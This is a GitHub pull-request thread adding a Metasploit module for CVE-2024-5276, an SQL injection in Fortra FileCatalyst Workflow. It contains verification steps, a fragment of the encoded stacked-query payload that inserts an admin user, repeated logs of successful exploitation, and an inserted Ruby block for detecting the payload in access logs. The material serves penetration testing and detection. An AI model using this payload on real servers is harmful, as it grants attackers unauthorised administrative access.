
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276) Module #19373

Merged (7 commits) Aug 19, 2024

Conversation

@h4x-x0r h4x-x0r (Contributor) commented Aug 8, 2024

This is a new module which exploits an unauthenticated SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135 (CVE-2024-5276), by adding a new
administrative user to the web interface of the application.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's installation guide.
  3. Start msfconsole
  4. use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli
  5. set RHOSTS <IP>
  6. set RPORT <PORT>
  7. set TARGETURI <URI>
  8. set NEW_USERNAME <username>
  9. set NEW_PASSWORD <password>
  10. run

A new admin user should have been successfully added.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.137.195

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: CBD945F52F91E0F4354296C939BDABDE
[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=3324035&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=3324040&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
[+] Login successful!
[+] New admin user was successfully injected:
	elroy:yodTwsPs
[+] Login at: http://192.168.137.195:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed

Successfully tested on

  • Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Windows 10 22H2
  • Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Ubuntu 24.04 LTS

vprint_status("\tPW_CreationDate: #{pw_creationdate}")
vprint_status("\tLastLogin: #{lastlogin}")

payload = '1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C' \
Contributor (review comment on the lines above):

Is there a way to format this a bit better, if only for maintenance/modifications' sake?

h4x-x0r (Contributor Author) replied:

I've split the string into multiple smaller strings, but I agree that it still does not provide great readability. Do you have any specific suggestions what else could be done?
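Separate from the readability question above, the fragment shows what the request carries on the wire: a percent-encoded stacked query whose decoded prefix is `1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ...`. The following Ruby is an added detection example written for this thread; it is not part of the module or the Metasploit code base. It scans constructed access-log lines (Common Log Format is assumed; FileCatalyst Workflow's own log format is not shown here), percent-decodes each query parameter of requests under `/workflow/` (repeatedly, so double encoding does not hide the payload), and flags values that contain a quote-terminated stacked DML/DDL statement. The parameter name `param` in the sample is a placeholder, since the PR does not name the vulnerable parameter.

```ruby
require 'cgi'
require 'uri'

# Constructed sample access-log lines (not real FileCatalyst logs). Line 3 carries the
# percent-encoded stacked-query prefix from the module's payload fragment; the query
# parameter name "param" is a placeholder. Line 4 is a legitimate double-encoded apostrophe
# (O'Brien) that must NOT be flagged.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [08/Aug/2024:10:00:01 +0000] "GET /workflow/jsp/logon.jsp HTTP/1.1" 200 1532
  10.0.0.5 - - [08/Aug/2024:10:00:05 +0000] "GET /workflow/createNewJob.do?.rnd2=3324035&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS HTTP/1.1" 302 0
  10.0.0.5 - - [08/Aug/2024:10:00:07 +0000] "GET /workflow/jsp/chooseOrderForm.jsp?param=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%29 HTTP/1.1" 200 812
  10.0.0.9 - - [08/Aug/2024:10:01:00 +0000] "GET /workflow/jsp/search.jsp?q=O%2527Brien HTTP/1.1" 200 412
LOG

# Request line inside a CLF entry: "METHOD target HTTP/x.y"
REQUEST_RE = %r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"}

# A string literal closed by a quote, a statement separator, then a data/schema-changing
# keyword: the shape of the stacked query the module sends.
STACKED_QUERY = /['"]\s*;\s*(?:INSERT|UPDATE|DELETE|DROP|ALTER|CREATE)\b/i

# Percent-decode repeatedly (bounded) so double-encoded input is examined in clear text.
def deep_decode(value, rounds = 3)
  rounds.times do
    decoded = CGI.unescape(value)
    break if decoded == value
    value = decoded
  end
  value
end

# Inspect one request target; returns one finding per suspicious query parameter.
def inspect_request(target)
  uri = URI.parse(target)
  return [] unless uri.path.start_with?('/workflow/') && uri.query
  URI.decode_www_form(uri.query).each_with_object([]) do |(name, raw), findings|
    decoded = deep_decode(raw)             # decode_www_form already removed one layer
    next unless decoded.match?(STACKED_QUERY)
    findings << { path: uri.path, param: name, decoded: decoded }
  end
end

# Scan a whole log text; each finding carries the 1-based line number it came from.
def scan_log(text)
  text.each_line.with_index(1).each_with_object([]) do |(line, no), findings|
    next unless (m = REQUEST_RE.match(line))
    inspect_request(m[:target]).each { |f| findings << f.merge(line: no) }
  end
end

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line]}: #{f[:path]} param=#{f[:param]} -> #{f[:decoded]}"
  end
end
```

The redirect chain the module prints (`createNewJob.do` followed by `chooseOrderForm.jsp`, both carrying `FCWEB.FORM.TOKEN`) is ordinary application traffic and is deliberately not matched; only the decoded parameter content is judged, so the same check works whether the injected text arrives single- or double-encoded.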

Code cleanup
@dledda-r7 dledda-r7 (Contributor) left a comment

Hello @h4x-x0r! Thanks for your PR!
The exploit works fine but I noticed the code is repeated two times.
Logs:

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > exploit
[*] Running module against 127.0.0.1

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 9961556DCE0FC38B6D5B8D4F97823852
[*] FCWEB.FORM.TOKEN value: EYr4RlkpGK2URuACgFKt
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=8027650&FCWEB.FORM.TOKEN=EYr4RlkpGK2URuACgFKt
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=8027658&FCWEB.FORM.TOKEN=EYr4RlkpGK2URuACgFKt
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: EYr4RlkpGK2URuACgFKt
[+] Login successful!
[+] New admin user was successfully injected:
	gillian:ZEuKCYzN
[+] Login at: http://127.0.0.1:8080/workflow/jsp/logon.jsp
[*] Running module against ::1
[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: E885733650D12A5558C99507700F9F16
[*] FCWEB.FORM.TOKEN value: QQjgtkZYMXuyYZ0baj4I
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=8027685&FCWEB.FORM.TOKEN=QQjgtkZYMXuyYZ0baj4I
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=8027691&FCWEB.FORM.TOKEN=QQjgtkZYMXuyYZ0baj4I
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: QQjgtkZYMXuyYZ0baj4I
[+] Login successful!
[+] New admin user was successfully injected:
	gillian:ZEuKCYzN
[+] Login at: http://::1:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed

@h4x-x0r h4x-x0r (Contributor Author) commented Aug 13, 2024

> Hello @h4x-x0r! Thanks for your PR! The exploit works fine but I noticed the code is repeated two times. Logs:

Thank you for reviewing the PR!

Does this also happen if you specify a remote system, or when using the IP address of your local system? In both cases, I only get it executed once.

From the output you shared, it looks like the loopback interface is being used, hence it is being run twice (127.0.0.1 for IPv4 and ::1 for IPv6). Is there a Metasploit specific way to prevent doing this when localhost is specified?

Added store_valid_credential
cleanup
@dledda-r7 dledda-r7 (Contributor) left a comment

Ok, after checking the latest changes I think everything looks good to me.
Thanks!

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > set rhosts 192.168.136.130
rhosts => 192.168.136.130
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > exploit
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: AF6686AF60868F7B69D4237A4B113B48
[*] FCWEB.FORM.TOKEN value: 0pY8KfI0k676jnVO6Iw9
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=5810883&FCWEB.FORM.TOKEN=0pY8KfI0k676jnVO6Iw9
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=5810891&FCWEB.FORM.TOKEN=0pY8KfI0k676jnVO6Iw9
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: 0pY8KfI0k676jnVO6Iw9
[+] Login successful!
[+] New admin user was successfully injected:
	yuri:WoASjjyU
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > creds
Credentials
===========

host             origin           service                        public                           private                                                            realm            private_type  JtR Format  cracked_password
----             ------           -------                        ------                           -------                                                            -----            ------------  ----------  ----------------
192.168.136.130  192.168.136.130  8080/tcp (http)                yuri                             WoASjjyU                                                                            Password

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > 

Code cleanup
@dledda-r7 (Contributor)

Retested after the change, everything looks good.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 5C3F0256688007F7EDD7C53D442B7B78
[*] FCWEB.FORM.TOKEN value: HGHjUHscGO65mS8Vmv6b
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=5955701&FCWEB.FORM.TOKEN=HGHjUHscGO65mS8Vmv6b
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=5955711&FCWEB.FORM.TOKEN=HGHjUHscGO65mS8Vmv6b
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: HGHjUHscGO65mS8Vmv6b
[+] Login successful!
[+] New admin user was successfully injected:
	elda:tbcsqWTq0l4EF7F2
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) >

Code cleanup
cleanup
@dledda-r7 (Contributor)

Guess we are all set, landing it.

msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
[*] Running module against 192.168.136.130

[*] Starting SQL injection workflow...
[+] Server reachable.
[*] JSESSIONID value: 5E471DAA883965B261106A683F849932
[*] FCWEB.FORM.TOKEN value: buFPmgjajDmZ4zsEI5zF
[*] Redirect #1: /workflow/createNewJob.do?.rnd2=6067908&FCWEB.FORM.TOKEN=buFPmgjajDmZ4zsEI5zF
[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=6067914&FCWEB.FORM.TOKEN=buFPmgjajDmZ4zsEI5zF
[*] Received expected response.
[+] SQL injection successful!
[*] Confirming credentials...
[*] FCWEB.FORM.TOKEN value: buFPmgjajDmZ4zsEI5zF
[+] Login successful!
[+] New admin user was successfully injected:
	hilary:KpiWAvIL705OSE4O
[+] Login at: http://192.168.136.130:8080/workflow/jsp/logon.jsp
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > 

@dledda-r7 dledda-r7 merged commit afd0f19 into rapid7:master Aug 19, 2024
39 checks passed
@dledda-r7 dledda-r7 commented Aug 19, 2024

Release Notes

This adds an auxiliary module to exploit CVE-2024-5276, a SQL injection vulnerability that allows adding an arbitrary administrative user to the application.

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 19, 2024
@h4x-x0r h4x-x0r (Contributor Author) commented Aug 19, 2024

Great, thank you!
